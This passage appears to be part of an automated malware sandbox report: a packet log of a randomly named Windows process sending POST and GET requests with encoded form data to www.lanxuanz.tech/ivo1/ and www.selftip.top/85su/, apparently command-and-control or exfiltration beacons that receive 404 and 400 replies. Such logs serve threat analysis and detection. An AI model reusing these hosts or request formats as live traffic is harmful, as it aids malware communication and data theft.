                                  Sep 16, 2024 09:31:51.816786051 CEST723INData Raw: c4 9a 5a 58 38 05 97 29 f2 ef 81 e3 55 a0 be 94 ef ab 5a 00 f6 d9 e7 e9 9c c0 6c 7b 93 6b ab 67 c2 34 cd ba d3 f4 2c 34 dd c7 f4 f0 bb 68 4a df 6a 53 9e 8b 89 32 b1 09 9f 4f 97 da 49 1f 31 8a fa 36 da b0 5f 7f 03 32 c3 56 c0 ad 37 cd a8 02 6d 73
                                  Data Ascii: ZX8)UZl{kg4,4hJjS2OI16_2V7msr$0Njq{}7Mpa [^Xw7)fGL6n0WE5<5-VI0F#)514csjq\GQ=uwOS{<,GrK


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  22192.168.2.455831136.143.186.12805964C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  TimestampBytes transferredDirectionData
                                  Sep 16, 2024 09:31:53.751403093 CEST794OUTPOST /ivo1/ HTTP/1.1
                                  Host: www.lanxuanz.tech
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.lanxuanz.tech
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 222
                                  Referer: http://www.lanxuanz.tech/ivo1/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Data Raw: 68 32 50 74 39 3d 53 4a 54 6c 46 64 39 4f 6e 32 36 32 48 48 50 51 75 2b 6a 69 49 71 4f 46 62 46 55 50 70 6f 55 62 2b 6d 72 64 35 32 78 6f 38 4d 36 70 37 54 47 51 57 6d 76 4c 6a 65 47 39 4f 4f 46 56 4a 67 69 78 39 47 57 39 37 44 2f 50 6a 41 30 4b 74 54 44 4c 57 55 48 55 2f 6f 39 37 5a 7a 6f 4f 75 33 2f 2f 5a 76 61 70 38 57 61 6d 6e 74 66 74 65 2b 54 4d 53 62 5a 38 73 55 4c 43 68 78 31 31 72 38 4e 55 79 73 31 36 48 4f 4d 52 4b 55 36 5a 64 4f 33 4f 6a 65 44 6b 35 57 39 58 30 74 55 43 4c 63 39 50 61 68 65 7a 44 72 77 44 30 2b 71 79 59 59 57 45 4c 4c 62 49 63 53 75 6b 35 69 6e 35 45 36 4c 72 51 54 64 32 47 77 59 4a 33 51 53 42 38 50 57 32 46 54 61 37 43 6d 59 3d
                                  Data Ascii: h2Pt9=SJTlFd9On262HHPQu+jiIqOFbFUPpoUb+mrd52xo8M6p7TGQWmvLjeG9OOFVJgix9GW97D/PjA0KtTDLWUHU/o97ZzoOu3//Zvap8Wamntfte+TMSbZ8sULChx11r8NUys16HOMRKU6ZdO3OjeDk5W9X0tUCLc9PahezDrwD0+qyYYWELLbIcSuk5in5E6LrQTd2GwYJ3QSB8PW2FTa7CmY=
                                  Sep 16, 2024 09:31:54.363596916 CEST1236INHTTP/1.1 404
                                  Server: ZGS
                                  Date: Mon, 16 Sep 2024 07:31:54 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: zalb_8ae64e9492=9a53152e40f8a6327f1486af29c1a1cb; Path=/
                                  Set-Cookie: csrfc=24516bb7-e653-4a88-8a43-0f9311ec35ff;path=/;priority=high
                                  Set-Cookie: _zcsr_tmp=24516bb7-e653-4a88-8a43-0f9311ec35ff;path=/;SameSite=Strict;priority=high
                                  Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate
                                  Pragma: no-cache
                                  Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                  vary: accept-encoding
                                  Content-Encoding: gzip
                                  Data Raw: 35 36 66 0d 0a 1f 8b 08 00 00 00 00 00 00 00 cd 58 5b 6f db 36 14 7e df af 60 15 b4 68 b1 28 92 25 2b 76 15 d9 c5 96 0c c5 9e 3a a0 03 86 0d 7b a1 25 ca 22 42 91 02 49 c7 4e 82 fd f7 1d 52 b2 ad 6b 93 f5 69 76 03 8b e2 b9 f1 7c df 39 24 9b bc b9 fb 72 fb fb 9f bf fd 82 0a 5d b2 f5 0f 49 fd 83 10 4a 0a 82 33 fb 64 06 25 d1 18 71 5c 92 95 23 c5 46 68 e5 a0 54 70 4d b8 5e 39 5c 50 9e 91 c3 25 e2 22 17 8c 89 bd 79 c2 32 2d e8 03 31 8f 8a d3 aa 22 da 41 de c9 9c a6 9a 91 f5 5f a2 10 89 57 3f 1f 67 18 e5 f7 48 3f 56 e0 48 93 83 f6 52 05 ae 24 61 2b 47 e9 47 46 54 41 8c a5 42 92 7c e5 78 7b b2 c9 21 0a f5 29 c7 25 65 8f ab 2f 15 e1 3f 7e c5 5c c5 73 df bf bc f6 7d e7 64 d7 6a 1f 47 f0 d9 88 ec f1 f9 3c 84 8f b1 e4 d6 86 62 c7 58 42 c6 92 73 89 14 fc b8 8a 48 9a df 0c 15 14 7d 22 f1 6c 56 1d ba 73 25 96 5b ca 63 1f de a3 ce 44 85 b3 8c f2 ed c8 cc 06 a7 f7 5b 29 76 3c 73 53 c1 84 8c 2f f2 c8 7c 5b 86 ff 39 3f 5e 69 51 dd 1a 31 f5 3c 61 25 46 6e 29 9e 5c 48 28 c1 d2 dd 4a 9c 51 80 eb 3d 23 b9 be 44 17 b9 3f [TRUNCATED]
                                  Data Ascii: 56fX[o6~`h(%+v:{%"BINRkiv|9$r]IJ3d%q\#FhTpM^9\P%"y2-1"A_W?gH?VHR$a+GGFTAB|x{!)%e/?~\s}djG<bXBsH}"lVs%[cD[)v<sS/|[9?^iQ1<a%Fn)\H(JQ=#D?_Euu,Xyo?LSt7Ba6%?DvL1)R{7V</fKOsN{vPc}0@J0|-NeNt$E+Ca^uK0gE,0][`Zn~.^D %cT,#|K1{Q;,1oz&j5#ZIdZA@OXU0_Qcq&?!S
                                  Sep 16, 2024 09:31:54.363715887 CEST723INData Raw: c4 9a 5a 58 38 05 97 29 f2 ef 81 e3 55 a0 be 94 ef ab 5a 00 f6 d9 e7 e9 9c c0 6c 7b 93 6b ab 67 c2 34 cd ba d3 f4 2c 34 dd c7 f4 f0 bb 68 4a df 6a 53 9e 8b 89 32 b1 09 9f 4f 97 da 49 1f 31 8a fa 36 da b0 5f 7f 03 32 c3 56 c0 ad 37 cd a8 02 6d 73
                                  Data Ascii: ZX8)UZl{kg4,4hJjS2OI16_2V7msr$0Njq{}7Mpa [^Xw7)fGL6n0WE5<5-VI0F#)514csjq\GQ=uwOS{<,GrK


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  23192.168.2.455832136.143.186.12805964C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  TimestampBytes transferredDirectionData
                                  Sep 16, 2024 09:31:56.295933008 CEST10876OUTPOST /ivo1/ HTTP/1.1
                                  Host: www.lanxuanz.tech
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.lanxuanz.tech
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 10302
                                  Referer: http://www.lanxuanz.tech/ivo1/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Data Raw: 68 32 50 74 39 3d 53 4a 54 6c 46 64 39 4f 6e 32 36 32 48 48 50 51 75 2b 6a 69 49 71 4f 46 62 46 55 50 70 6f 55 62 2b 6d 72 64 35 32 78 6f 38 4d 79 70 37 68 2b 51 56 46 48 4c 69 65 47 39 51 65 45 53 4a 67 69 38 39 43 36 35 37 44 7a 35 6a 43 4d 4b 73 78 4c 4c 66 41 7a 55 30 6f 39 37 42 44 70 4a 67 58 2b 33 5a 72 47 74 38 57 4b 6d 6e 74 66 74 65 38 4c 4d 55 4f 74 38 75 55 4c 64 32 42 31 35 38 73 4d 39 79 73 74 45 48 4f 5a 73 4a 6b 61 5a 64 75 6e 4f 6c 73 62 6b 78 57 39 52 31 64 55 67 4c 63 41 58 61 6c 2f 4b 44 71 55 70 30 38 32 79 61 65 58 6e 62 62 50 4a 4b 69 2f 36 76 41 72 38 42 49 58 5a 57 55 56 53 42 46 59 39 6d 6b 69 33 36 75 48 79 58 51 37 38 55 51 61 55 35 52 78 5a 4f 72 6a 67 63 58 30 57 6a 4f 70 7a 34 57 33 56 6b 54 41 55 66 61 51 77 5a 43 69 69 41 55 64 66 74 64 6c 37 4f 39 33 79 70 33 77 41 36 4c 51 6b 49 54 69 75 72 75 74 63 4c 67 56 6a 69 4d 61 6d 6f 69 2b 6e 32 43 7a 4d 65 32 38 55 67 38 77 32 62 62 4a 55 43 51 2f 5a 59 69 58 76 72 73 5a 72 57 32 44 4a 34 68 77 66 37 71 74 6b 64 79 76 31 [TRUNCATED]
                                  Data Ascii: h2Pt9=SJTlFd9On262HHPQu+jiIqOFbFUPpoUb+mrd52xo8Myp7h+QVFHLieG9QeESJgi89C657Dz5jCMKsxLLfAzU0o97BDpJgX+3ZrGt8WKmntfte8LMUOt8uULd2B158sM9ystEHOZsJkaZdunOlsbkxW9R1dUgLcAXal/KDqUp082yaeXnbbPJKi/6vAr8BIXZWUVSBFY9mki36uHyXQ78UQaU5RxZOrjgcX0WjOpz4W3VkTAUfaQwZCiiAUdftdl7O93yp3wA6LQkITiurutcLgVjiMamoi+n2CzMe28Ug8w2bbJUCQ/ZYiXvrsZrW2DJ4hwf7qtkdyv1VjvrZN/0f7A2Iz5RC43HsbZzw1VTMUIdM7w5QrhG7fJc1pQ004c7sIyERCIL6FoiNXknrco+LxjK4Ib+DBA6MmZUOk6saxKfSNGH6JnIFRraEjeJNbZxLdYYsxlaREPcgNvj+RgjDkznt0985gJyhQ6ltmnAV3XCFiUU97XoxE61Q8lGphvqyQxYILaUDYIQOYrRx4fDZNy5y/LecaoIv+i9BqD35hCGwisG6vQbExNtc4HRBFvfAvvP6q+wKtzTYza8WqI9ppOP0jCz1MxhC15vzcxEkePBEia8T79+NdDjxoSdIFj/lNZmAdBuPGCZZE/a/w4TnnW4SYDEIM0y1OZOppKHB36/1T8WSJIsvFjGGy96mn2szqyp6NJOkZKWV/nXv8Ej05a1JmTQWg1+2EEoPGA4s44PtyA3sCJWLiUE0gNslX1VLWPUD2AaoQl+HrJCquGnaTaNIGDYLEDUC6Q9y9T1kkXsU44Ux0gNLpdpi0bjJKmnsTftdizKtYfZFx3GWnlogRlpP63dMnkz3FscYAelkbPUv2enNKOzB8JhGEHY6SDQS1BVWwPAB28kWvCKoWImlZQnjKyMOsSgujRKR1weELnBOANVz/QgJZLU8gWjSsMiNiA3sn6dF9kGO461+7Hkd4/wvs7Y+FFSkBb/VD3WPgoO67 [TRUNCATED]
                                  Sep 16, 2024 09:31:56.919030905 CEST549INHTTP/1.1 400
                                  Server: ZGS
                                  Date: Mon, 16 Sep 2024 07:31:56 GMT
                                  Content-Type: text/html;charset=ISO-8859-1
                                  Content-Length: 80
                                  Connection: close
                                  Set-Cookie: zalb_8ae64e9492=ed5ecf2ddf0efdb48949d480344efa60; Path=/
                                  Set-Cookie: csrfc=50d7bdd2-4008-493f-a0cd-8a79b930a374;path=/;priority=high
                                  Set-Cookie: _zcsr_tmp=50d7bdd2-4008-493f-a0cd-8a79b930a374;path=/;SameSite=Strict;priority=high
                                  Set-Cookie: JSESSIONID=340A28F6229DD23CEA862A6D95A42F6C; Path=/; HttpOnly
                                  Data Raw: 7b 22 72 65 73 70 6f 6e 73 65 5f 63 6f 64 65 22 3a 22 34 30 30 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 22 31 22 2c 22 64 65 76 65 6c 6f 70 65 72 5f 6d 65 73 73 61 67 65 22 3a 22 49 6e 76 61 6c 69 64 20 69 6e 70 75 74 2e 22 7d 0a 0a
                                  Data Ascii: {"response_code":"400","status_code":"1","developer_message":"Invalid input."}


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  24192.168.2.455833136.143.186.12805964C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  TimestampBytes transferredDirectionData
                                  Sep 16, 2024 09:31:58.837265968 CEST511OUTGET /ivo1/?h2Pt9=fL7FGqwZgFyeKETJ58v2LpmodVM6vZtD0XO9xnYIy5nXxzuHXVLl0+u5SqQtPDeu0FT/+Cn/ojl8jT3mUhnhpKNreTIBn1GsPPCO7XuNhO+zSMbYdoB0rmQ=&4RLhs=7BJLM4eH HTTP/1.1
                                  Host: www.lanxuanz.tech
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Connection: close
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Sep 16, 2024 09:31:59.435956955 CEST1236INHTTP/1.1 404
                                  Server: ZGS
                                  Date: Mon, 16 Sep 2024 07:31:59 GMT
                                  Content-Type: text/html
                                  Content-Length: 4641
                                  Connection: close
                                  Set-Cookie: zalb_8ae64e9492=d2341ff8556820e5fe7583c4c06e32ae; Path=/
                                  Set-Cookie: csrfc=36e84a87-ed21-454b-b48b-c60bbf29f94c;path=/;priority=high
                                  Set-Cookie: _zcsr_tmp=36e84a87-ed21-454b-b48b-c60bbf29f94c;path=/;SameSite=Strict;priority=high
                                  Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate
                                  Pragma: no-cache
                                  Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                  vary: accept-encoding
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 61 72 63 68 69 76 65 2c 20 6e 6f 73 6e 69 70 70 65 74 22 20 2f 3e 0a 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 5a 6f 68 6f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 77 65 62 66 6f 6e 74 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 36 30 30 22 3e 0a 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 78 3b 0a 20 20 20 20 20 20 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html> <head> <meta name="robots" content="noindex, nofollow, noarchive, nosnippet" /> <title>Zoho</title> <link type="text/css" rel="stylesheet" href="/webfonts?family=Open+Sans:400,600"> <style> body{ font-family:"Open Sans", sans-serif; font-size:11px; margin:0px; padding:0px; background-color:#f5f5f5; } .topColors{ background: -moz-linear-gradient(left, #f0473d 0%, #f0473d 25%, #049735 25%, #049735 50%, #0086d5 50%, #0086d5 75%, #fdc000 75%,#fdc000 100%); background: -webkit-linear-gradient(left, #f0473d 0%, #f0473d 25%, #049735 25%, #049735 50
                                  Sep 16, 2024 09:31:59.435981989 CEST1236INData Raw: 25 2c 20 23 30 30 38 36 64 35 20 35 30 25 2c 20 23 30 30 38 36 64 35 20 37 35 25 2c 20 23 66 64 63 30 30 30 20 37 35 25 2c 23 66 64 63 30 30 30 20 31 30 30 25 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a
                                  Data Ascii: %, #0086d5 50%, #0086d5 75%, #fdc000 75%,#fdc000 100%); background-size:452px auto;height:3px; } .mainContainer{ width:1000px; margin:0px auto; } .logo{ margin
                                  Sep 16, 2024 09:31:59.435997963 CEST1236INData Raw: 20 20 20 20 20 20 20 20 68 33 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 4f 70 65 6e 20 53 61 6e 73 22 3b 0a 20 20 20 20
                                  Data Ascii: h3{ font-size:18px; font-family: "Open Sans"; font-weight:normal; font-weight:600; } .weight400{ font-weight:400; } .domain-color{
                                  Sep 16, 2024 09:31:59.436369896 CEST1236INData Raw: 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 31 32 29 3b 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b
                                  Data Ascii: rgba(0, 0, 0, 0.12); color: #ffffff; font-size: 18px; font-weight: 300; padding: 10px 20px; text-decoration: none; position:relative; } </style
                                  Sep 16, 2024 09:31:59.436384916 CEST223INData Raw: 63 6f 6e 74 61 69 6e 65 72 22 3e 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 77 69 64 74 68 3d 22 37 30 30 70 78 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 7a 6f 68 6f 2e 63 6f 6d 2f 73 69 74 65
                                  Data Ascii: container"> <img width="700px" src="https://www.zoho.com/sites/images/professionally-crafted-themes.png" style="margin-top: 15px"> </div> </div> </div> </body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  25192.168.2.455834199.192.21.169805964C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  TimestampBytes transferredDirectionData
                                  Sep 16, 2024 09:32:04.916574955 CEST768OUTPOST /85su/ HTTP/1.1
                                  Host: www.selftip.top
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.selftip.top
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 202
                                  Referer: http://www.selftip.top/85su/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Data Raw: 68 32 50 74 39 3d 7a 31 70 61 63 58 76 33 7a 71 55 44 6a 4c 39 45 77 69 6c 58 6f 52 6b 48 46 61 4a 2b 56 76 73 6b 31 79 70 46 5a 55 4d 44 64 50 39 50 4f 6c 38 76 77 4c 41 4b 67 73 36 6c 53 51 6c 6c 63 68 6d 2b 2f 41 70 4b 50 42 63 41 73 79 70 2b 70 66 4c 55 6b 74 6d 77 45 76 6a 78 47 6c 47 6c 59 39 31 4b 2f 62 48 55 70 59 6c 6a 46 6d 75 75 6b 31 43 53 72 74 30 66 33 37 71 39 6d 57 77 74 57 6f 68 54 7a 47 6b 68 4b 54 61 33 74 54 4c 71 58 62 61 33 2f 7a 4e 4a 48 73 77 32 57 42 52 55 6a 39 6d 7a 6a 35 72 44 64 71 7a 44 52 34 50 38 66 79 57 43 6b 2f 6f 62 32 4f 4b 35 58 4f 44 35 77 5a 55 38 6f 77 3d 3d
                                  Data Ascii: h2Pt9=z1pacXv3zqUDjL9EwilXoRkHFaJ+Vvsk1ypFZUMDdP9POl8vwLAKgs6lSQllchm+/ApKPBcAsyp+pfLUktmwEvjxGlGlY91K/bHUpYljFmuuk1CSrt0f37q9mWwtWohTzGkhKTa3tTLqXba3/zNJHsw2WBRUj9mzj5rDdqzDR4P8fyWCk/ob2OK5XOD5wZU8ow==
                                  Sep 16, 2024 09:32:05.500449896 CEST918INHTTP/1.1 404 Not Found
                                  Date: Mon, 16 Sep 2024 07:32:05 GMT
                                  Server: Apache
                                  Content-Length: 774
                                  Connection: close
                                  Content-Type: text/html
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  26192.168.2.455835199.192.21.169805964C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  TimestampBytes transferredDirectionData
                                  Sep 16, 2024 09:32:07.473736048 CEST788OUTPOST /85su/ HTTP/1.1
                                  Host: www.selftip.top
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.selftip.top
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 222
                                  Referer: http://www.selftip.top/85su/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Data Raw: 68 32 50 74 39 3d 7a 31 70 61 63 58 76 33 7a 71 55 44 69 71 4e 45 32 7a 6c 58 6b 68 6b 45 4c 36 4a 2b 65 50 73 67 31 79 6c 46 5a 56 35 49 64 39 70 50 50 45 4d 76 69 36 41 4b 7a 63 36 6c 59 77 6c 67 44 78 6e 79 2f 41 56 43 50 42 51 41 73 7a 4e 2b 70 64 44 55 6c 65 65 78 43 76 6a 7a 4f 46 47 72 46 4e 31 4b 2f 62 48 55 70 59 78 4a 46 6e 47 75 6a 46 79 53 72 4a 6f 41 37 62 72 50 6a 6d 77 74 53 6f 67 61 7a 47 6b 50 4b 57 37 71 74 51 6a 71 58 65 6d 33 2f 69 4e 49 49 73 77 38 49 78 51 47 74 63 53 32 71 4c 75 41 55 4e 62 45 50 34 66 75 65 30 48 59 31 4f 4a 4d 6b 4f 75 4b 4b 4a 4b 4e 39 61 70 31 7a 39 32 48 37 55 73 61 55 6a 58 4f 7a 74 30 32 66 6e 69 54 42 6f 49 3d
                                  Data Ascii: h2Pt9=z1pacXv3zqUDiqNE2zlXkhkEL6J+ePsg1ylFZV5Id9pPPEMvi6AKzc6lYwlgDxny/AVCPBQAszN+pdDUleexCvjzOFGrFN1K/bHUpYxJFnGujFySrJoA7brPjmwtSogazGkPKW7qtQjqXem3/iNIIsw8IxQGtcS2qLuAUNbEP4fue0HY1OJMkOuKKJKN9ap1z92H7UsaUjXOzt02fniTBoI=
                                  Sep 16, 2024 09:32:08.056215048 CEST918INHTTP/1.1 404 Not Found
                                  Date: Mon, 16 Sep 2024 07:32:07 GMT
                                  Server: Apache
                                  Content-Length: 774
                                  Connection: close
                                  Content-Type: text/html
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  27192.168.2.455836199.192.21.169805964C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  TimestampBytes transferredDirectionData
                                  Sep 16, 2024 09:32:10.014894009 CEST7416OUTPOST /85su/ HTTP/1.1
                                  Host: www.selftip.top
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.selftip.top
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 10302
                                  Referer: http://www.selftip.top/85su/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
